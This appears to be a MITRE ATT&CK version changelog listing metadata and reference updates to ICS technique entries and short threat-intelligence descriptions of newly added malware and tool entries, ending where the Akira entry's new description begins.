external_references[3]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
external_references[3]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0827] Loss of Control
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:08.613000+00:00 | 2025-04-15 19:58:56.356000+00:00 |
external_references[3]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
external_references[3]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0828] Loss of Productivity and Revenue
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:06.362000+00:00 | 2025-04-16 21:26:15.157000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0837] Loss of Protection
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:01.994000+00:00 | 2025-04-16 21:26:12.172000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0880] Loss of Safety
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:06.171000+00:00 | 2025-04-16 21:26:14.990000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0829] Loss of View
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
x_mitre_detection | | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:59.396000+00:00 | 2025-04-15 19:58:08.228000+00:00 |
external_references[2]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
external_references[2]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0835] Manipulate I/O Image
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:03.589000+00:00 | 2025-04-15 19:58:22.225000+00:00 |
external_references[1]['description'] | Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 | Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/ | https://www.scribd.com/document/458637574/Programmable-Logic-Controllers |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0831] Manipulation of Control
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:59.793000+00:00 | 2025-04-16 21:26:10.752000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0832] Manipulation of View
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:04.993000+00:00 | 2025-04-15 19:58:29.210000+00:00 |
external_references[2]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
external_references[2]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0849] Masquerading
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:10.181000+00:00 | 2025-04-16 21:26:18.036000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0838] Modify Alarm Settings
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:12.528000+00:00 | 2025-04-16 21:26:19.764000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0821] Modify Controller Tasking
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:58.991000+00:00 | 2025-04-16 21:26:10.230000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0836] Modify Parameter
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:58.786000+00:00 | 2025-04-16 21:26:10.077000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0889] Modify Program
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-20 17:01:10.138000+00:00 | 2025-04-15 19:59:24.213000+00:00 |
[T0839] Module Firmware
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:13.531000+00:00 | 2025-04-16 21:26:20.310000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0801] Monitor Process State
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:02.197000+00:00 | 2025-04-16 21:26:12.337000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0834] Native API
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:09.388000+00:00 | 2025-04-16 21:26:17.499000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0840] Network Connection Enumeration
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-29 14:04:50.569000+00:00 | 2025-04-15 19:59:18.381000+00:00 |
[T0842] Network Sniffing
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:03.783000+00:00 | 2025-04-16 21:26:13.380000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0861] Point & Tag Identification
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:00.575000+00:00 | 2025-04-16 21:26:11.231000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0843] Program Download
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:10.374000+00:00 | 2025-04-16 21:26:18.212000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0845] Program Upload
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:02.785000+00:00 | 2025-04-16 21:26:12.867000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0873] Project File Infection
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:12.926000+00:00 | 2025-04-15 19:59:17.481000+00:00 |
external_references[2]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0886] Remote Services
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:12.125000+00:00 | 2025-04-16 21:26:19.525000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0846] Remote System Discovery
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:11.536000+00:00 | 2025-04-16 21:26:18.958000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0888] Remote System Information Discovery
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:02.595000+00:00 | 2025-04-16 21:26:12.694000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0847] Replication Through Removable Media
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:10.581000+00:00 | 2025-04-15 19:59:04.946000+00:00 |
external_references[7]['description'] | Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14 | Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses. Retrieved November 17, 2024. |
external_references[7]['url'] | https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/ | https://web.archive.org/web/20160430041256/https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0848] Rogue Master
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:09.193000+00:00 | 2025-04-16 21:26:17.326000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0851] Rootkit
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:03.989000+00:00 | 2025-04-16 21:26:13.542000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0852] Screen Capture
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:10.768000+00:00 | 2025-04-16 21:26:18.404000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0853] Scripting
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:02.398000+00:00 | 2025-04-16 21:26:12.511000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0881] Service Stop
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:58.586000+00:00 | 2025-04-15 19:58:03.170000+00:00 |
[T0865] Spearphishing Attachment
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:06.577000+00:00 | 2025-04-16 21:26:15.346000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0856] Spoof Reporting Message
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:07.260000+00:00 | 2025-04-16 21:26:15.909000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0869] Standard Application Layer Protocol
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:11.924000+00:00 | 2025-04-16 21:26:19.328000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0862] Supply Chain Compromise
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:05.975000+00:00 | 2025-04-16 21:26:14.822000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0894] System Binary Proxy Execution
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-08 18:57:58.010000+00:00 | 2025-04-15 19:58:11.559000+00:00 |
[T0857] System Firmware
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:09.988000+00:00 | 2025-04-16 21:26:17.862000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0882] Theft of Operational Information
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:09.780000+00:00 | 2025-04-16 21:26:17.698000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0864] Transient Cyber Asset
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:03.395000+00:00 | 2025-04-15 19:58:21.226000+00:00 |
[T0855] Unauthorized Command Message
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:04.582000+00:00 | 2025-04-16 21:26:13.939000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0863] User Execution
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:00.969000+00:00 | 2025-04-15 19:58:15.054000+00:00 |
external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0859] Valid Accounts
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:11.152000+00:00 | 2025-04-15 19:59:08.866000+00:00 |
external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0860] Wireless Compromise
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:57:01.165000+00:00 | 2025-04-15 19:58:15.610000+00:00 |
external_references[1]['description'] | Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 | Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.slideshare.net/dgpeters/17-bolshev-1-13 | https://www.slideshare.net/slideshow/17-bolshev-1-13/32178888 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0887] Wireless Sniffing
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-13 17:56:59.193000+00:00 | 2025-04-16 21:26:10.392000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Software
enterprise-attack
New Software
[S1167] AcidPour
Current version: 1.0
Description:
AcidPour is a variant of AcidRain designed to impact a wider range of x86 architecture Linux devices. AcidPour is an x86 ELF binary that expands on the targeted devices and locations in AcidRain by including items such as Unsorted Block Image (UBI), Device Mapper (DM), and various flash memory references. Based on this expanded targeting, AcidPour can impact a variety of device types including IoT, networking, and ICS embedded device types.(Citation: SentinelOne AcidPour 2024) AcidPour is a wiping payload associated with the Sandworm Team threat actor, and potentially linked to attacks against Ukrainian internet service providers (ISPs) in 2023.(Citation: CERT-UA TelecomAttack 2023)
[S1194] Akira _v2
Current version: 1.0
Description:
Akira _v2 is a Rust-based variant of Akira ransomware that has been in use since at least 2024. Akira _v2 is designed to target VMware ESXi servers and includes a new command-line argument set and other expanded capabilities.(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024)(Citation: Palo Alto Howling Scorpius DEC 2024)
[S1184] BOLDMOVE
Current version: 1.0
Description:
BOLDMOVE is a type of backdoor malware written in C linked to People's Republic of China operations from 2022 through 2023. BOLDMOVE includes both Windows and Linux variants, with some Linux variants specifically designed for FortiGate Firewall devices. BOLDMOVE is linked to zero-day exploitation of CVE-2022-42475 in FortiOS SSL-VPNs.(Citation: Google Cloud BOLDMOVE 2023) The record for BOLDMOVE only covers known Linux variants.
[S1181] BlackByte 2.0 Ransomware
Current version: 1.0
Description:
BlackByte 2.0 Ransomware is a replacement for BlackByte Ransomware. Unlike BlackByte Ransomware, BlackByte 2.0 Ransomware does not have a common key for victim decryption. BlackByte 2.0 Ransomware remains uniquely associated with BlackByte operations.(Citation: Microsoft BlackByte 2023)
[S1180] BlackByte Ransomware
Current version: 1.0
Description:
BlackByte Ransomware is uniquely associated with BlackByte operations. BlackByte Ransomware used a common key for infections, allowing for the creation of a universal decryptor.(Citation: Trustwave BlackByte 2021)(Citation: FBI BlackByte 2022) BlackByte Ransomware was replaced in BlackByte operations by BlackByte 2.0 Ransomware by 2023.(Citation: Microsoft BlackByte 2023)(Citation: Cisco BlackByte 2024)
[S1179] Exbyte
Current version: 1.0
Description:
Exbyte is an exfiltration tool written in Go that is uniquely associated with BlackByte operations. Observed since 2022, Exbyte transfers collected files to online file sharing and hosting services.(Citation: Symantec BlackByte 2022)
[S1197] GoBear
Current version: 1.0
Description:
GoBear is a Go-based backdoor that abuses legitimate, stolen certificates for defense evasion purposes. GoBear is exclusively linked to Kimsuky operations.(Citation: S2W Troll Stealer 2024)(Citation: Symantec Troll Stealer 2024)
[S1198] Gomir
Current version: 1.0
Description:
Gomir is a Linux backdoor variant of the Go-based malware GoBear, uniquely associated with Kimsuky operations.(Citation: Symantec Troll Stealer 2024)
[S1211] Hannotog
Current version: 1.0
Description:
Hannotog is a type of backdoor malware uniquely associated with Lotus Blossom operations since at least 2022.(Citation: Symantec Bilbug 2022)
[S1203] J-magic
Current version: 1.0
Description:
J-magic is a custom variant of the cd00r backdoor tailored to target Juniper routers that was first observed during the J-magic Campaign in mid-2023. J-magic monitors TCP traffic for five predefined parameters or "magic packets" to be sent by the attackers before activating on compromised devices.(Citation: Lumen J-Magic JAN 2025)
[S1206] JumbledPath
Current version: 1.0
Description:
JumbledPath is a custom-built utility written in Go that has been used by Salt Typhoon since at least 2024 for packet capture on remote Cisco devices. JumbledPath is compiled as an ELF binary for the x86-64 architecture, which makes it potentially usable across Linux operating systems and network devices from multiple vendors.(Citation: Cisco Salt Typhoon FEB 2025)
[S1190] Kapeka
Current version: 1.0
Description:
Kapeka is a backdoor written in C++ used against victims in Eastern Europe since at least mid-2022. Kapeka has technical overlaps with Exaramel for Windows and Prestige malware variants, both of which are linked to Sandworm Team. Kapeka may have been used in advance of Prestige deployment in late 2022.(Citation: WithSecure Kapeka 2024)(Citation: Microsoft KnuckleTouch 2024)
[S1185] LightSpy
Current version: 1.0
Description:
First observed in 2018, LightSpy is a modular malware family that initially targeted iOS devices in Southern Asia before expanding to Android and macOS platforms. It consists of a downloader, a main executable that manages network communications, and functionality-specific modules, typically implemented as .dylib files (iOS, macOS) or .apk files (Android). LightSpy can collect VoIP call recordings, SMS messages, and credential stores, which are then exfiltrated to a command and control (C2) server.(Citation: MelikovBlackBerry LightSpy 2024)
[S1186] Line Dancer
Current version: 1.0
Description:
Line Dancer is a memory-only Lua-based shellcode loader associated with the ArcaneDoor campaign. Line Dancer allows an adversary to upload and execute arbitrary shellcode on victim devices.(Citation: Cisco ArcaneDoor 2024)(Citation: CCCS ArcaneDoor 2024)
[S1188] Line Runner
Current version: 1.0
Description:
Line Runner is a persistent backdoor and web shell allowing threat actors to upload and execute arbitrary Lua scripts. Line Runner is associated with the ArcaneDoor campaign.(Citation: CCCS ArcaneDoor 2024)(Citation: Cisco ArcaneDoor 2024)
[S1199] LockBit 2.0
Current version: 1.0
Description:
LockBit 2.0 is an affiliate-based Ransomware-as-a-Service (RaaS) that has been in use since at least June 2021 as the successor to LockBit Ransomware. LockBit 2.0 has versions capable of infecting Windows and VMware ESXi virtual machines, and has been observed targeting multiple industry verticals globally.(Citation: FBI Lockbit 2.0 FEB 2022)(Citation: Palo Alto Lockbit 2.0 JUN 2022)
[S1202] LockBit 3.0
Current version: 1.0
Description:
LockBit 3.0 is an evolution of the LockBit Ransomware-as-a-Service (RaaS) offering with similarities to BlackMatter and BlackCat ransomware. LockBit 3.0 has been in use since at least June 2022 and features enhanced defense evasion and exfiltration tactics, robust encryption methods for Windows and VMware ESXi systems, and a more refined RaaS structure over its predecessors such as LockBit 2.0.(Citation: Sentinel Labs LockBit 3.0 JUL 2022)(Citation: Joint Cybersecurity Advisory LockBit JUN 2023)(Citation: Joint Cybersecurity Advisory LockBit 3.0 MAR 2023)(Citation: INCIBE-CERT LockBit MAR 2024)
[S1213] Lumma Stealer
Current version: 1.0
Description:
Lumma Stealer is an information stealer malware family in use since at least 2022. Lumma Stealer is a Malware as a Service (MaaS) where captured data has been sold in criminal markets to Initial Access Brokers.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025)
[S1182] MagicRAT
Current version: 1.0
Description:
MagicRAT is a remote access tool developed in C++ and exclusively used by the Lazarus Group threat actor in operations. MagicRAT allows for arbitrary command execution on victim machines and provides basic remote access functionality.(Citation: Cisco MagicRAT 2022)
[S1169] Mango
Current version: 1.0
Description:
Mango is a first-stage backdoor written in C#/.NET that was used by OilRig during the Juicy Mix campaign. Mango is the successor to Solar and includes additional exfiltration capabilities, the use of native APIs, and added detection evasion code.(Citation: ESET OilRig Campaigns Sep 2023)
[S1191] Megazord
Current version: 1.0
Description:
Megazord is a Rust-based variant of Akira ransomware that has been in use since at least August 2023 to target Windows environments. Megazord has been attributed to the Akira group based on overlapping infrastructure though is possibly not exclusive to the group.(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024)(Citation: Palo Alto Howling Scorpius DEC 2024)
[S1192] NICECURL
Current version: 1.0
Description:
NICECURL is a VBScript-based backdoor used by APT42 to download additional modules.(Citation: Mandiant APT42-untangling)
[S1189] Neo-reGeorg
Current version: 1.0
Description:
Neo-reGeorg is an open-source web shell designed as a restructuring of reGeorg with improved usability, security, and fixes for existing reGeorg bugs.(Citation: GitHub Neo-reGeorg 2019)
[S1170] ODAgent
Current version: 1.0
Description:
ODAgent is a C#/.NET downloader that has been used by OilRig since at least 2022 including against target organizations in Israel to download and execute payloads and to exfiltrate staged files.(Citation: ESET OilRig Downloaders DEC 2023)
[S1172] OilBooster
Current version: 1.0
Description:
OilBooster is a downloader written in Microsoft Visual C/C++ that has been used by OilRig since at least 2022 including against target organizations in Israel to download and execute files and for exfiltration.(Citation: ESET OilRig Downloaders DEC 2023)
[S1171] OilCheck
Current version: 1.0
Description:
OilCheck is a C#/.NET downloader that has been used by OilRig since at least 2022 including against targets in Israel. OilCheck uses draft messages created in a shared email account for C2 communication.(Citation: ESET OilRig Downloaders DEC 2023)
[S1173] PowerExchange
Current version: 1.0
Description:
PowerExchange is a PowerShell backdoor that has been used by OilRig since at least 2023 including against government targets in the Middle East.(Citation: Symantec Crambus OCT 2023)
[S1209] Quick Assist
Current version: 1.0
Description:
Quick Assist is a remote assistance tool primarily for Microsoft Windows, although a macOS version also exists. Quick Assist allows for remote screen sharing and, with end user approval, remote control and command execution on the enabling device.(Citation: Microsoft Storm-1811 2024)(Citation: Microsoft Quick Assist 2024)
[S1212] RansomHub
Current version: 1.0
Description:
RansomHub is a ransomware-as-a-service (RaaS) offering with Windows, ESXi, Linux, and FreeBSD versions that has been in use since at least 2024 to target organizations in multiple sectors globally. RansomHub operators may have purchased and rebranded resources from Knight (formerly Cyclops) Ransomware which shares infrastructure, feature, and code overlaps with RansomHub.(Citation: CISA RansomHub AUG 2024)(Citation: Group-IB RansomHub FEB 2025)
[S1210] Sagerunex
Current version: 1.0
Description:
Sagerunex is a malware family exclusively associated with Lotus Blossom operations, with variants existing since at least 2016. Variations of Sagerunex leverage non-traditional command and control mechanisms such as various web services.(Citation: Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025)
[S1168] SampleCheck5000
Current version: 1.0
Description:
SampleCheck5000 is a downloader with multiple variants that was used by OilRig including during the Outer Space campaign to download and execute additional payloads.(Citation: ESET OilRig Campaigns Sep 2023)(Citation: ESET OilRig Downloaders DEC 2023)
[S1178] ShrinkLocker
Current version: 1.0
Description:
ShrinkLocker is a VBS-based malicious script that leverages the legitimate BitLocker application to encrypt files on victim systems for ransom. ShrinkLocker functions by using BitLocker to encrypt files, then renames impacted drives to the adversary's contact email address to facilitate communication for the ransom payment.(Citation: Kaspersky ShrinkLocker 2024)(Citation: Splunk ShrinkLocker 2024)
[S1163] SnappyTCP
Current version: 1.0
Description:
SnappyTCP is a web shell used by Sea Turtle between 2021 and 2023 against multiple victims. SnappyTCP appears to be based on a public GitHub project that has since been removed from the code-sharing site. SnappyTCP includes a simple reverse TCP shell for Linux and Unix environments with basic command and control capabilities.(Citation: PWC Sea Turtle 2023)
[S1166] Solar
Current version: 1.0
Description:
Solar is a C#/.NET backdoor that was used by OilRig during the Outer Space campaign to download, execute, and exfiltrate files.(Citation: ESET OilRig Campaigns Sep 2023)
[S1200] StealBit
Current version: 1.0
Description:
StealBit is a data exfiltration tool that is developed and maintained by the operators of the LockBit Ransomware-as-a-Service (RaaS) and offered to affiliates to exfiltrate data from compromised systems for double extortion purposes.(Citation: Cybereason StealBit Exfiltration Tool)(Citation: FBI Lockbit 2.0 FEB 2022)
[S1183] StrelaStealer
Current version: 1.0
Description:
StrelaStealer is an information stealer malware variant first identified in November 2022 and active through late 2024. StrelaStealer focuses on the automated identification, collection, and exfiltration of email credentials from email clients such as Outlook and Thunderbird.(Citation: DCSO StrelaStealer 2022)(Citation: PaloAlto StrelaStealer 2024)(Citation: Fortgale StrelaStealer 2023)(Citation: IBM StrelaStealer 2024)
[S1193] TAMECAT
Current version: 1.0
Description:
TAMECAT is a malware that is used by APT42 to execute PowerShell or C# content.(Citation: Mandiant APT42-untangling)
[S1201] TRANSLATEXT
Current version: 1.0
Description:
TRANSLATEXT is malware that is believed to be used by Kimsuky.(Citation: Zscaler Kimsuky TRANSLATEXT) TRANSLATEXT masqueraded as a Google Translate extension for Google Chrome, but is actually a collection of four malicious JavaScript files that perform defense evasion, information collection and exfiltration.(Citation: Zscaler Kimsuky TRANSLATEXT)
[S1196] Troll Stealer
Current version: 1.0
Description:
Troll Stealer is an information stealer written in Go associated with Kimsuky operations. Troll Stealer has typically been delivered through a dropper disguised as a legitimate security program installation file. Troll Stealer features code similar to AppleSeed, also uniquely associated with Kimsuky operations.(Citation: S2W Troll Stealer 2024)(Citation: Symantec Troll Stealer 2024)
[S1164] UPSTYLE
Current version: 1.0
Description:
UPSTYLE is a Python-based backdoor associated with exploitation of Palo Alto firewalls using CVE-2024-3400 in early 2024. UPSTYLE has only been observed in relation to this exploitation activity, which involved attempted install on compromised devices by the threat actor UTA0218.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
[S1207] XLoader
Current version: 1.0
Description:
XLoader is an infostealer malware in use since at least 2016. Previously known and sometimes still referred to as Formbook, XLoader is a Malware as a Service (MaaS) known for stealing data from web browsers, email clients and File Transfer Protocol (FTP) applications.(Citation: Zscaler XLoader 2025)(Citation: ANY.RUN XLoader 2023)(Citation: CheckPoint XLoader 2022)(Citation: Acronis XLoader 2021)(Citation: Google XLoader 2017)
[S1176] attrib
Current version: 1.0
Description:
attrib is a Windows utility used to display, set or remove attributes assigned to files or directories.(Citation: Microsoft attrib 2023)
[S1204] cd00r
Current version: 1.0
Description:
cd00r is an open-source backdoor for UNIX and UNIX-variant operating systems that was originally released in 2000. cd00r source code is primarily based on a packet-capturing program, as it utilizes a sniffer to listen for a specific sequence of network traffic, or "secret knock", before executing the attacker's code.(Citation: Hartrell cd00r 2002)(Citation: Lumen J-Magic JAN 2025)
[S1205] cipher.exe
Current version: 1.0
Description:
cipher.exe is a native Microsoft utility that manages encryption of directories and files on NTFS (New Technology File System) partitions by using the Encrypting File System (EFS).(Citation: cipher.exe)
[S1187] reGeorg
Current version: 1.0
Description:
reGeorg is an open-source web shell written in Python that can be used as a proxy to bypass firewall rules and tunnel data in and out of targeted networks.(Citation: Fortinet reGeorg MAR 2019)(Citation: GitHub reGeorg 2016)
Major Version Changes
[S1129] Akira
Current version: 2.0
Version changed from: 1.0 → 2.0
Old description:
[Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the a ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024).(Citation: Kersten Akira 2023)

New description:
